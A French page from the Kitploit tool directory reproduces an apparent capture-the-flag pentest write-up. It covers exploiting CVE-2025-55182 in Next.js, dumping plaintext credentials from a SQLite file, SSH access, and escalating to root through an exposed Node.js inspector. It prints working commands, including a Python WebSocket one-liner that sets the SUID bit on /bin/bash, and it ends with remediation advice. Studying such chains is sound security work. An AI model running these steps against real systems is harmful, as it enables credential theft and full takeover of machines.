Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-55182 — Compte rendu technique de test d'intrusion démontrant l'exploitation de CVE-2025-55182 dans Next.js, la collecte d'identifiants depuis SQLite, et l'élévation de privilèges via l'inspecteur Node.js pour obtenir un accès root. | Kitploit
Outils/GitHubGitHub/chrisbarack/cve-2025-55182
Escalade de PrivilègesReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubchrisbarack/cve-2025-55182

cve-2025-55182

Compte rendu technique de test d'intrusion démontrant l'exploitation de CVE-2025-55182 dans Next.js, la collecte d'identifiants depuis SQLite, et l'élévation de privilèges via l'inspecteur Node.js pour obtenir un accès root.

Voir le dépôt
il y a 9h 10mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Write-up de Test d'Intrusion : RCE sur Next.js et Élévation de Privilèges via l'Inspector Node.js

Ce write-up technique détaille le chemin d'exploitation pour compromettre une cible hébergeant une application web Next.js vulnérable, obtenir un accès initial via des identifiants récupérés, et exploiter un inspector V8 Node.js local mal configuré pour une élévation de privilèges vers root.

Phase 1 : Reconnaissance Externe et Exploitation Web

Empreinte Initiale

La cible héberge une application web Next.js fonctionnant sur les ports HTTP/HTTPS standards (80/443). L'énumération standard des répertoires et l'analyse manuelle indiquent que l'application exécute une version vulnérable à la CVE-2025-55182.

Exploitation via Burp Suite

Pour exploiter la vulnérabilité, interceptez le trafic de l'application à l'aide de Burp Suite (ou Burp Repeater) et injectez une charge utile d'exploitation conçue pour cibler la CVE-2025-55182.

Découverte de la Base de Données

Après avoir obtenu l'exécution de code et la lecture de fichiers locaux via l'exploit, inspectez le répertoire source de l'application. Le fichier de base de données SQLite locale (database.db) est situé à côté du code source principal de l'application.

Phase 2 : Extraction des Identifiants et Accès Initial

Inspection de la Base de Données

Interrogez ou extrayez le contenu du fichier de base de données pour récupérer les enregistrements utilisateurs stockés.

root@kitploit:~
sqlite3 database.db "SELECT * FROM users;"

Extraction des Identifiants

Localisez le mot de passe en clair associé à l'utilisateur SSH local engineer.

Connexion SSH

Utilisez les identifiants récupérés pour établir une session SSH avec la machine cible :

root@kitploit:~
ssh engineer@<TARGET-IP>

Récupération du Drapeau Utilisateur

Une fois authentifié, lisez le drapeau utilisateur situé dans le répertoire personnel :

root@kitploit:~
cat /home/engineer/user.txt

Phase 3 : Élévation de Privilèges via l'Inspector Node.js

Reconnaissance des Ports Internes

Vérifiez les services liés exclusivement à l'interface de bouclage locale (127.0.0.1) pour identifier les surfaces d'attaque internes :

root@kitploit:~
netstat -tulnp

Résultat : Un service Node.js interne écoute activement sur le port local 9229.

Découverte de l'UUID du Débogueur

Les ports de débogage V8 de Node.js nécessitent un UUID de session unique pour la communication WebSocket. Interrogez le point de terminaison de découverte local à l'aide de curl avec /json ajouté :

root@kitploit:~
curl -s http://127.0.0.1:9229/json

Sortie :

root@kitploit:~
{
  "webSocketDebuggerUrl": "ws://127.0.0.1:9229/46a680a0-1cf5-4af4-9ce6-474f77329639"
}

Exécution de la Charge Utile d'Élévation de Privilèges

Étant donné que le processus Node.js cible s'exécute avec les privilèges root, vous pouvez envoyer un message Runtime.evaluate du protocole Chrome DevTools (CDP) via Python sur WebSockets pour définir le bit SUID sur /bin/bash :

root@kitploit:~
python3 -c 'import websocket, json; ws = websocket.create_connection("ws://127.0.0.1:9229/<YOUR-UUID>"); ws.send(json.dumps({"id": 1, "method": "Runtime.evaluate", "params": {"expression": "process.mainModule.require(\"child_process\").execSync(\"chmod +s /bin/bash\")"}})); print(ws.recv()); ws.close()'

Obtention d'un Shell Root

Vérifiez que /bin/bash dispose désormais des permissions SUID activées (-rwsr-sr-x), puis invoquez Bash en préservant les privilèges :

root@kitploit:~
ls -l /bin/bash
bash -p

Récupération du Drapeau Root

Naviguez vers le répertoire personnel de l'utilisateur root pour capturer le drapeau final :

root@kitploit:~
cd /root
cat root.txt

La sécurisation des environnements contre ces vecteurs nécessite de corriger les applications web vulnérables aux CVE connues, de restreindre correctement les permissions des fichiers de base de données, et de garantir que les ports de débogage (tels que l'inspector Node.js sur le port 9229) ne soient jamais exposés ou laissés accessibles sans authentification dans les environnements de production.

Télécharger l’outil